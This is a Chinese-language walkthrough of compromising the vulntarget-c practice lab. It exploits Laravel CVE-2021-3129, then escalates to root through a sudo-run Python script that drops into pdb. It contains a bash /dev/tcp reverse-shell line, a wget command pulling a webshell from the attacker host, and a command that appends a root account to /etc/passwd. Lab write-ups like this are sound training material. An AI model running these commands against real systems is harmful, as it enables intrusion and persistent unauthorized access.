vuntarget免责声明

vulntarget靶场系列仅供安全专业人员练习渗透测试技术，此靶场所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用靶场中的技术资料对任何计算机系统进行入侵操作。利用此靶场所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

vulntarget靶场系列拥有对此靶场系列的的修改、删除和解释权限，未经授权，不得用于其他。

下载地址

百度云链接:

https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p

其中vulntarget-c是本次环境

github地址：

https://github.com/crow821/vulntarget

1. 拓扑图

2. 网络配置

2.1 网关配置

2.2 win2016

win2016测试连通性

修改ubuntu 20

2.3 ubuntu20

ubuntu 20测试连通性

3. 打靶过程

3.1 第一层

nmap端口扫描

看到80端口开放的Laravel

寻找了多个EXP之后，终于找到一个能用的：将脚本文件和phpggc这个脚本放在同一级目录下

phpgcc：https://codeload.github.com/ambionics/phpggc/zip/refs/heads/master
exp：https://github.com/crisprss/Laravel_CVE-2021-3129_EXP

使用方法就是使用python3 exp.py "system('id')"，里面的IP需要改成攻击的IP

测试反弹shell不成功

bash -i >& /dev/tcp/192.168.0.107/6666 0>&1

pwd也是在当前目录

开启的是PHP+Apache环境，linux下apache的默认路径 /var/www/html，看到了存在laravel的压缩包

直接看到public下的入口文件index.php

本来想在这里写入一句话木马，先把index.php备份了一下

python3 Laravel_CVE-2021-3129_EXP.py "system('cp /var/www/html/public/index.php /var/www/html/public/index.php.bak');"

但是发现存在过滤，导致写入失败

所以直接使用wget命令下载了一个冰蝎马上去，连接成功：

python3 Laravel_CVE-2021-3129_EXP.py "system('cd /var/www/html/public&&wget http://192.168.0.107:81/shell.php');"

直接上传一个msf的elf后门上去，msf还是挺好用的。接下来就是提权

然后使用suggester脚本搜索提权的漏洞，这里搜索到一个：

但是尝试攻击之后，发现并没有攻击成功或者说是没有session返回

在host目录下发现存在vulntarget目录，在home下存在这个目录说明可能存在这个用户

来到cat/ etc/passwd来确认，确实存在这个用户：

使用工具来进行爆破，在一开始的端口扫描发现是存在ssh的vulntarge存在弱密码：

当然也可以使用hydra进行爆破：

使用ssh登录上来

尝试使用suid提权，发现并没有可以使用的提权

使用sudo -l查看哪些文件是可以使用root权限执行的，在/opt/root.py存在一个python文件

这个pdb漏洞不是太懂，看了作者的文章：这个脚本就是开启一个监听器，需要输入密码才能进入选项进行相应的选项。这里没有添加else，如果使用了非数字会进入调试器，在调试器中就可以执行python命令

这里忘记截图了，就是说sudo root.py之后在ssh进入一个新的，或者nc 192.168.0.120 port生成的端口，接着输入一个非数字，就会进入如下界面。可以执行os.system('id')命令是root 尝试反弹shell和执行后门文件都不行，所以我直接写入一个root用户，查看/etc/passwd写入成功

(Pdb) os.system('echo 'nami:nami$6L6IhMNlfyB2WqmHiWRy30:0:0::/root:/bin/bash' >>/etc/passwd')

使用ssh登录成功，获取一个root权限的账户

在/root/flag查看flag

顺便再执行一下后门文件上传到msf，方便进行下一步渗透